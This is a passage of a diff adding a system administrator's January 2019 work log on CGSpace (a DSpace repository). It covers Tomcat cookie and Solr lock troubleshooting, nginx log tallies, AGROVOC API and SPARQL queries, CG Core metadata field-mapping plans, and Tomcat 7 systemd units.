+    at org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:595)
+    at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:399)
+    at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:386)
+    at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:330)
+    at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:728)
+    at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:470)
+    at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:395)
+    at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:316)
+    at org.dspace.app.webui.util.JSPManager.showJSP(JSPManager.java:60)
+    at org.apache.jsp.index_jsp._jspService(index_jsp.java:191)
+    at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
+    at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
+    at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:476)
+    at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:386)
+    at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:330)
+    at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:198)
+    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
+    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:493)
+    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:140)
+    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)
+    at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:234)
+    at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:650)
+    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:87)
+    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:342)
+    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:800)
+    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
+    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:806)
+    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1498)
+    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
+    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+    at java.lang.Thread.run(Thread.java:748)
+
    +
  • I notice that I get different JSESSIONID cookies for / (XMLUI) and /jspui (JSPUI) on Tomcat 8.5.37; I wondered if it’s the same on Tomcat 7.0.92… and yes, I get different cookies there too.
  • +
  • Hmm, on Tomcat 7.0.92 I see that I get a dspace.current.user.id session cookie after logging into XMLUI, and then when I browse to JSPUI I am still logged in… +
      +
    • I didn’t see that cookie being set on Tomcat 8.5.37
    • +
    +
  • +
  • I sent a message to the dspace-tech mailing list to ask
  • +
+

2019-01-04

+
    +
  • Linode sent a message last night that CGSpace (linode18) had high CPU usage, but I don’t see anything around that time in the web server logs:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Jan/2019:1(7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    189 207.46.13.192
+    217 31.6.77.23
+    340 66.249.70.29
+    349 40.77.167.86
+    417 34.218.226.147
+    630 207.46.13.173
+    710 35.237.175.180
+    790 40.77.167.87
+   1776 66.249.70.27
+   2099 54.70.40.11
+
    +
  • I’m thinking about trying to validate our dc.subject terms against AGROVOC webservices
  • +
  • There seem to be a few APIs and the documentation is kinda confusing, but I found this REST endpoint that does work well, for example searching for SOIL:
  • +
+
$ http 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=SOIL&lang=en'
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: *
+Connection: Keep-Alive
+Content-Length: 493
+Content-Type: application/json; charset=utf-8
+Date: Fri, 04 Jan 2019 13:44:27 GMT
+Keep-Alive: timeout=5, max=100
+Server: Apache
+Strict-Transport-Security: max-age=63072000; includeSubdomains
+Vary: Accept
+X-Content-Type-Options: nosniff
+X-Frame-Options: ALLOW-FROM http://aims.fao.org
+
+{
+    "@context": {
+        "@language": "en",
+        "altLabel": "skos:altLabel",
+        "hiddenLabel": "skos:hiddenLabel",
+        "isothes": "http://purl.org/iso25964/skos-thes#",
+        "onki": "http://schema.onki.fi/onki#",
+        "prefLabel": "skos:prefLabel",
+        "results": {
+            "@container": "@list",
+            "@id": "onki:results"
+        },
+        "skos": "http://www.w3.org/2004/02/skos/core#",
+        "type": "@type",
+        "uri": "@id"
+    },
+    "results": [
+        {
+            "lang": "en",
+            "prefLabel": "soil",
+            "type": [
+                "skos:Concept"
+            ],
+            "uri": "http://aims.fao.org/aos/agrovoc/c_7156",
+            "vocab": "agrovoc"
+        }
+    ],
+    "uri": ""
+}
+
    +
  • The API does not appear to be case sensitive (searches for SOIL and soil return the same thing)
  • +
  • I’m a bit confused that there’s no obvious return code or status when a term is not found, for example SOILS:
  • +
+
HTTP/1.1 200 OK
+Access-Control-Allow-Origin: *
+Connection: Keep-Alive
+Content-Length: 367
+Content-Type: application/json; charset=utf-8
+Date: Fri, 04 Jan 2019 13:48:31 GMT
+Keep-Alive: timeout=5, max=100
+Server: Apache
+Strict-Transport-Security: max-age=63072000; includeSubdomains
+Vary: Accept
+X-Content-Type-Options: nosniff
+X-Frame-Options: ALLOW-FROM http://aims.fao.org
+
+{
+    "@context": {
+        "@language": "en",
+        "altLabel": "skos:altLabel",
+        "hiddenLabel": "skos:hiddenLabel",
+        "isothes": "http://purl.org/iso25964/skos-thes#",
+        "onki": "http://schema.onki.fi/onki#",
+        "prefLabel": "skos:prefLabel",
+        "results": {
+            "@container": "@list",
+            "@id": "onki:results"
+        },
+        "skos": "http://www.w3.org/2004/02/skos/core#",
+        "type": "@type",
+        "uri": "@id"
+    },
+    "results": [],
+    "uri": ""
+}
+
    +
  • I guess the results object will just be empty…
  • +
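  • A quick Python sketch of that idea, using the REST endpoint above and treating an empty results list as “not found”:
  • +
+
import requests
+
+def check_terms(terms, lang='en'):
+    for term in terms:
+        resp = requests.get('http://agrovoc.uniroma2.it/agrovoc/rest/v1/search',
+                            params={'query': term, 'lang': lang})
+        resp.raise_for_status()
+        # A term that is not in AGROVOC just comes back with "results": []
+        if resp.json().get('results'):
+            print(f'{term}: matched in AGROVOC')
+        else:
+            print(f'{term}: no match')
+
+# For example, with the two terms tested above:
+check_terms(['SOIL', 'SOILS'])
+
    +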
  • Another way would be to try with SPARQL, perhaps using the Python 2.7 sparql-client:
  • +
+
$ python2.7 -m virtualenv /tmp/sparql
+$ . /tmp/sparql/bin/activate
+$ pip install sparql-client ipython
+$ ipython
+In [10]: import sparql
+In [11]: s = sparql.Service("http://agrovoc.uniroma2.it:3030/agrovoc/sparql", "utf-8", "GET")
+In [12]: statement=('PREFIX skos: <http://www.w3.org/2004/02/skos/core#> '
+    ...: 'SELECT '
+    ...: '?label '
+    ...: 'WHERE { '
+    ...: '{  ?concept  skos:altLabel ?label . } UNION {  ?concept  skos:prefLabel ?label . } '
+    ...: 'FILTER regex(str(?label), "^fish", "i") . '
+    ...: '} LIMIT 10')
+In [13]: result = s.query(statement)
+In [14]: for row in result.fetchone():
+   ...:     print(row)
+   ...:
+(<Literal "fish catching"@en>,)
+(<Literal "fish harvesting"@en>,)
+(<Literal "fish meat"@en>,)
+(<Literal "fish roe"@en>,)
+(<Literal "fish conversion"@en>,)
+(<Literal "fisheries catches (composition)"@en>,)
+(<Literal "fishtail palm"@en>,)
+(<Literal "fishflies"@en>,)
+(<Literal "fishery biology"@en>,)
+(<Literal "fish production"@en>,)
+
    +
  • The SPARQL query comes from my notes in 2017-08
  • +
+

2019-01-06

+
    +
  • I built a clean DSpace 5.8 installation from the upstream dspace-5.8 tag and the issue with the XMLUI/JSPUI login is still there with Tomcat 8.5.37 +
      +
    • If I log into XMLUI and then navigate to JSPUI I need to log in again
    • +
    • XMLUI does not set the dspace.current.user.id session cookie in Tomcat 8.5.37 for some reason
    • +
    • I sent an update to the dspace-tech mailing list to ask for more help troubleshooting
    • +
    +
  • +
+

2019-01-07

+
    +
  • I built a clean DSpace 6.3 installation from the upstream dspace-6.3 tag and the issue with the XMLUI/JSPUI login is still there with Tomcat 8.5.37 +
      +
    • If I log into XMLUI and then navigate to JSPUI I need to log in again
    • +
    • XMLUI does not set the dspace.current.user.id session cookie in Tomcat 8.5.37 for some reason
    • +
    • I sent an update to the dspace-tech mailing list to ask for more help troubleshooting
    • +
    +
  • +
+

2019-01-08

+
    +
  • Tim Donohue responded to my thread about the cookies on the dspace-tech mailing list + +
  • +
+

2019-01-11

+
    +
  • Tezira wrote to say she has stopped receiving the DSpace Submission Approved and Archived emails from CGSpace as of January 2nd +
      +
    • I told her that I haven’t done anything to disable it lately, but that I would check
    • +
    • Bizu also says she hasn’t received them lately
    • +
    +
  • +
+

2019-01-14

+
    +
  • Day one of CGSpace AReS meeting in Amman
  • +
+

2019-01-15

+
    +
  • Day two of CGSpace AReS meeting in Amman +
      +
    • Discuss possibly extending the dspace-statistics-api to make community and collection statistics available
    • +
    • Discuss new “final” CG Core document and some changes that we’ll need to do on CGSpace and other repositories
    • +
    • We agreed to try to stick to pure Dublin Core where possible, then use fields that exist in standard DSpace, and use “cg” namespace for everything else
    • +
    • Major changes are to move dc.contributor.author to dc.creator (which MELSpace and WorldFish are already using in their DSpace repositories)
    • +
    +
  • +
  • I am testing the speed of the WorldFish DSpace repository’s REST API and it’s five to ten times faster than CGSpace as I tested in 2018-10:
  • +
+
$ time http --print h 'https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
+
+0.16s user 0.03s system 3% cpu 5.185 total
+0.17s user 0.02s system 2% cpu 7.123 total
+0.18s user 0.02s system 6% cpu 3.047 total
+
    +
  • In other news, Linode sent a mail last night that the CPU load on CGSpace (linode18) was high, here are the top IPs in the logs around those few hours:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "14/Jan/2019:(17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    157 31.6.77.23
+    192 54.70.40.11
+    202 66.249.64.157
+    207 40.77.167.204
+    220 157.55.39.140
+    326 197.156.105.116
+    385 207.46.13.158
+   1211 35.237.175.180
+   1830 66.249.64.155
+   2482 45.5.186.2
+

2019-01-16

+
    +
  • Day three of CGSpace AReS meeting in Amman +
      +
    • We discussed CG Core 2.0 metadata and decided some action points
    • +
    • We discussed branding of AReS tool
    • +
    +
  • +
  • Notes from our CG Core 2.0 metadata discussion: +
      +
    • Not Dublin Core: +
        +
      • dc.subtype
      • +
      • dc.peer-reviewed
      • +
      +
    • +
    • Dublin Core, possible action for CGSpace: +
        +
      • dc.description: +
          +
        • We use dc.description.abstract, dc.description (Notes), dc.description.version (Peer review status), dc.description.sponsorship (Funder)
        • +
        • Maybe move abstract to dc.description
        • +
        • Maybe notes moves to cg.description.notes???
        • +
        • Maybe move dc.description.version to cg.peer-reviewed or cg.peer-review-status???
        • +
        • Move dc.description.sponsorship to cg.contributor.donor???
        • +
        +
      • +
      • dc.subject: +
          +
        • Wait for guidance, evaluate technical implications (Google indexing, OAI, etc)
        • +
        +
      • +
      • Move dc.contributor.author to dc.creator
      • +
      • dc.contributor Project +
          +
        • Recommend against creating new fields for all projects
        • +
        • We use collections projects/themes/etc
        • +
        +
      • +
      • dc.contributor Project Lead Center +
          +
        • MELSpace uses cg.contributor.project-lead-institute (institute is more generic than center)
        • +
        • Maybe we should use that too?
        • +
        +
      • +
      • dc.contributor Partner +
          +
        • Wait for guidance
        • +
        • MELSpace uses cg.contibutor.center (?)
        • +
        +
      • +
      • dc.contributor Donor +
          +
        • Use cg.contributor.donor
        • +
        +
      • +
      • dc.date +
          +
        • Wait for guidance, maybe move dc.date.issued?
        • +
        • dc.date.accessioned and dc.date.available are automatic in DSpace
        • +
        +
      • +
      • dc.language +
          +
        • Move dc.language.iso to dc.language
        • +
        +
      • +
      • dc.identifier +
          +
        • Move cg.identifier.url to dc.identifier
        • +
        +
      • +
      • dc.identifier bibliographicCitation +
          +
        • dc.identifier.citation should move to dc.bibliographicCitation
        • +
        +
      • +
      • dc.description.notes +
          +
        • Wait for guidance, maybe move to cg.description.notes ???
        • +
        +
      • +
      • dc.relation +
          +
        • Maybe move cg.link.reference
        • +
        • Perhaps consolidate cg.link.audio etc. there…?
        • +
        +
      • +
      • dc.relation.isPartOf +
          +
        • Move dc.relation.ispartofseries to dc.relation.isPartOf
        • +
        +
      • +
      • dc.audience +
          +
        • Move cg.targetaudience to dc.audience
        • +
        +
      • +
      +
    • +
    +
  • +
  • Something happened to the Solr usage statistics on CGSpace +
      +
    • I looked on the server and the Solr cores are there (56GB!), and I don’t see any obvious errors in dmesg or anything
    • +
    • I see that the server hasn’t been rebooted in 26 days so I rebooted it
    • +
    +
  • +
  • After the reboot the Solr stats are still messed up in the Atmire Usage Stats module; it only shows 2019-01!
  • +
+

Solr stats fucked up

+
    +
  • In the Solr admin UI I see the following error:
  • +
+
statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
+
    +
  • Looking in the Solr log I see this:
  • +
+
2019-01-16 13:37:55,395 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
+org.apache.solr.common.SolrException: Error opening new searcher
+    at org.apache.solr.core.SolrCore.<init>(SolrCore.java:873)
+    at org.apache.solr.core.SolrCore.<init>(SolrCore.java:646)
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:491)
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:466)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:575)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
+    at org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:135)
+    at org.apache.solr.servlet.SolrDispatchFilter.handleAdminRequest(SolrDispatchFilter.java:729)
+    at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:258)
+    at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:207)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.dspace.solr.filters.LocalHostRestrictionFilter.doFilter(LocalHostRestrictionFilter.java:50)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:221)
+    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:505)
+    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
+    at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+    at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:956)
+    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:436)
+    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1078)
+    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:625)
+    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
+    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+    at java.lang.Thread.run(Thread.java:748)
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+    at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
+    at org.apache.solr.core.SolrCore.getSearcher(SolrCore.java:1677)
+    at org.apache.solr.core.SolrCore.<init>(SolrCore.java:845)
+    ... 31 more
+Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+    at org.apache.lucene.store.Lock.obtain(Lock.java:89)
+    at org.apache.lucene.index.IndexWriter.<init>(IndexWriter.java:753)
+    at org.apache.solr.update.SolrIndexWriter.<init>(SolrIndexWriter.java:77)
+    at org.apache.solr.update.SolrIndexWriter.create(SolrIndexWriter.java:64)
+    at org.apache.solr.update.DefaultSolrCoreState.createMainIndexWriter(DefaultSolrCoreState.java:279)
+    at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
+    at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
+    ... 33 more
+2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:613)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
+    at org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:135)
+    at org.apache.solr.servlet.SolrDispatchFilter.handleAdminRequest(SolrDispatchFilter.java:729)
+    at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:258)
+    at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:207)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.dspace.solr.filters.LocalHostRestrictionFilter.doFilter(LocalHostRestrictionFilter.java:50)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:221)
+    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:505)
+    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
+    at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+    at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:956)
+    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:436)
+    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1078)
+    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:625)
+    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
+    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+    at java.lang.Thread.run(Thread.java:748)
+Caused by: org.apache.solr.common.SolrException: Unable to create core [statistics-2018]
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:507)
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:466)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:575)
+    ... 27 more
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+    at org.apache.solr.core.SolrCore.<init>(SolrCore.java:873)
+    at org.apache.solr.core.SolrCore.<init>(SolrCore.java:646)
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:491)
+    ... 29 more
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+    at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
+    at org.apache.solr.core.SolrCore.getSearcher(SolrCore.java:1677)
+    at org.apache.solr.core.SolrCore.<init>(SolrCore.java:845)
+    ... 31 more
+Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+    at org.apache.lucene.store.Lock.obtain(Lock.java:89)
+    at org.apache.lucene.index.IndexWriter.<init>(IndexWriter.java:753)
+    at org.apache.solr.update.SolrIndexWriter.<init>(SolrIndexWriter.java:77)
+    at org.apache.solr.update.SolrIndexWriter.create(SolrIndexWriter.java:64)
+    at org.apache.solr.update.DefaultSolrCoreState.createMainIndexWriter(DefaultSolrCoreState.java:279)
+    at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
+    at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
+    ... 33 more
+
    +
  • I found some threads on StackOverflow etc discussing this and several suggested increasing the address space for the shell with ulimit
  • +
  • I added ulimit -v unlimited to the /etc/default/tomcat7 and restarted Tomcat and now Solr is working again:
  • +
+

Solr stats working

+ +
# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
+1442874
+
+real    0m17.161s
+user    0m16.205s
+sys     0m2.396s
+

2019-01-17

+
    +
  • Send reminder to Atmire about purchasing the MQM module
  • +
  • Trying to decide the solid action points for CGSpace on the CG Core 2.0 metadata…
  • +
  • It’s difficult to decide some of these because the current CG Core 2.0 document does not provide guidance or rationale (yet)!
  • +
  • Also, there is not a good Dublin Core reference (or maybe I just don’t understand?)
  • +
  • Several authoritative documents on Dublin Core appear to be: + +
  • +
  • And what is the relationship between DC and DCTERMS?
  • +
  • DSpace uses DCTERMS in the metadata it embeds in XMLUI item views!
  • +
  • We really need to look at this more carefully and see the impacts that might be made from switching core fields like languages, abstract, authors, etc
  • +
  • We can check WorldFish and MELSpace repositories to see what effects these changes have had on theirs because they have already adopted some of these changes…
  • +
  • I think I understand the difference between DC and DCTERMS finally: DC is the original set of fifteen elements and DCTERMS is the newer version that was supposed to address much of the drawbacks of the original with regards to digital content
  • +
  • We might be able to use some proper fields for citation, abstract, etc that are part of DCTERMS
  • +
  • To make matters more confusing, there is also “qualified Dublin Core” that uses the original fifteen elements of legacy DC and qualifies them, like dc.date.accessioned + +
  • +
  • So we should be trying to use DCTERMS where possible, unless it is some internal thing that might mess up DSpace (like dates)
  • +
  • “Elements 1.1” means legacy DC
  • +
  • Possible action list for CGSpace: +
      +
    • dc.description.abstract → dcterms.abstract
    • +
    • dc.description.version → cg.peer-reviewed (or cg.peer-review-status?)
    • +
    • dc.description.sponsorship → cg.contributor.donor
    • +
    • dc.contributor.author → dc.creator
    • +
    • dc.language.iso → dcterms.language
    • +
    • cg.identifier.url → dcterms.identifier
    • +
    • dc.identifier.citation → dcterms.bibliographicCitation
    • +
    • dc.relation.ispartofseries → dcterms.isPartOf
    • +
    • cg.targetaudience → dcterms.audience
    • +
    +
  • +
+
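    +
  • The same possible action list, captured as a simple old-to-new field mapping (nothing is decided yet, just a sketch to drive an eventual migration script):
  • +
+
# Proposed CG Core 2.0 field moves from the action list above (still tentative)
+cgcore_field_mapping = {
+    'dc.description.abstract': 'dcterms.abstract',
+    'dc.description.version': 'cg.peer-reviewed',  # or cg.peer-review-status?
+    'dc.description.sponsorship': 'cg.contributor.donor',
+    'dc.contributor.author': 'dc.creator',
+    'dc.language.iso': 'dcterms.language',
+    'cg.identifier.url': 'dcterms.identifier',
+    'dc.identifier.citation': 'dcterms.bibliographicCitation',
+    'dc.relation.ispartofseries': 'dcterms.isPartOf',
+    'cg.targetaudience': 'dcterms.audience',
+}
+
+for old, new in cgcore_field_mapping.items():
+    print(f'{old} -> {new}')
+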

2019-01-19

+
    +
  • +

    There’s no official set of Dublin Core qualifiers so I can’t tell if things like dc.contributor.author that are used by DSpace are official

    +
  • +
  • +

    I found a great presentation from 2015 by the Digital Repository of Ireland that discusses using MARC Relator Terms with Dublin Core elements

    +
  • +
  • +

    It seems that dc.contributor.author would be a supported term according to this Library of Congress list linked from the Dublin Core website

    +
  • +
  • +

    The Library of Congress document specifically says:

    +

    These terms conform with the DCMI Abstract Model and may be used in DCMI application profiles. DCMI endorses their use with Dublin Core elements as indicated.

    +
  • +
+

2019-01-20

+
    +
  • That’s weird, I logged into DSpace Test (linode19) and it says it has been up for 213 days:
  • +
+
# w
+ 04:46:14 up 213 days,  7:25,  4 users,  load average: 1.94, 1.50, 1.35
+
+

2019-01-21

+
    +
  • Investigating running Tomcat 7 on Ubuntu 18.04 with the tarball and a custom systemd package instead of waiting for our DSpace to get compatible with Ubuntu 18.04’s Tomcat 8.5
  • +
  • I could either run with a simple tomcat7.service like this:
  • +
+
[Unit]
+Description=Apache Tomcat 7 Web Application Container
+After=network.target
+[Service]
+Type=forking
+ExecStart=/path/to/apache-tomcat-7.0.92/bin/startup.sh
+ExecStop=/path/to/apache-tomcat-7.0.92/bin/shutdown.sh
+User=aorth
+Group=aorth
+[Install]
+WantedBy=multi-user.target
+
    +
  • Or try to adapt a real systemd service like Arch Linux’s:
  • +
+
[Unit]
+Description=Tomcat 7 servlet container
+After=network.target
+
+[Service]
+Type=forking
+PIDFile=/var/run/tomcat7.pid
+Environment=CATALINA_PID=/var/run/tomcat7.pid
+Environment=TOMCAT_JAVA_HOME=/usr/lib/jvm/default-runtime
+Environment=CATALINA_HOME=/usr/share/tomcat7
+Environment=CATALINA_BASE=/usr/share/tomcat7
+Environment=CATALINA_OPTS=
+Environment=ERRFILE=SYSLOG
+Environment=OUTFILE=SYSLOG
+
+ExecStart=/usr/bin/jsvc \
+            -Dcatalina.home=${CATALINA_HOME} \
+            -Dcatalina.base=${CATALINA_BASE} \
+            -Djava.io.tmpdir=/var/tmp/tomcat7/temp \
+            -cp /usr/share/java/commons-daemon.jar:/usr/share/java/eclipse-ecj.jar:${CATALINA_HOME}/bin/bootstrap.jar:${CATALINA_HOME}/bin/tomcat-juli.jar \
+            -user tomcat7 \
+            -java-home ${TOMCAT_JAVA_HOME} \
+            -pidfile /var/run/tomcat7.pid \
+            -errfile ${ERRFILE} \
+            -outfile ${OUTFILE} \
+            $CATALINA_OPTS \
+            org.apache.catalina.startup.Bootstrap
+
+ExecStop=/usr/bin/jsvc \
+            -pidfile /var/run/tomcat7.pid \
+            -stop \
+            org.apache.catalina.startup.Bootstrap
+
+[Install]
+WantedBy=multi-user.target
+
    +
  • I see that jsvc and libcommons-daemon-java are both available on Ubuntu so that should be easy to port
  • +
  • We probably don’t need Eclipse Java Bytecode Compiler (ecj)
  • +
  • I tested Tomcat 7.0.92 on Arch Linux using the tomcat7.service with jsvc and it works… nice!
  • +
  • I think I might manage this the same way I do the restic releases in the Ansible infrastructure scripts, where I download a specific version and symlink to some generic location without the version number
  • +
  • I verified that there is indeed an issue with sharded Solr statistics cores on DSpace, which will cause inaccurate results in the dspace-statistics-api:
  • +
+
$ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
+<result name="response" numFound="33" start="0">
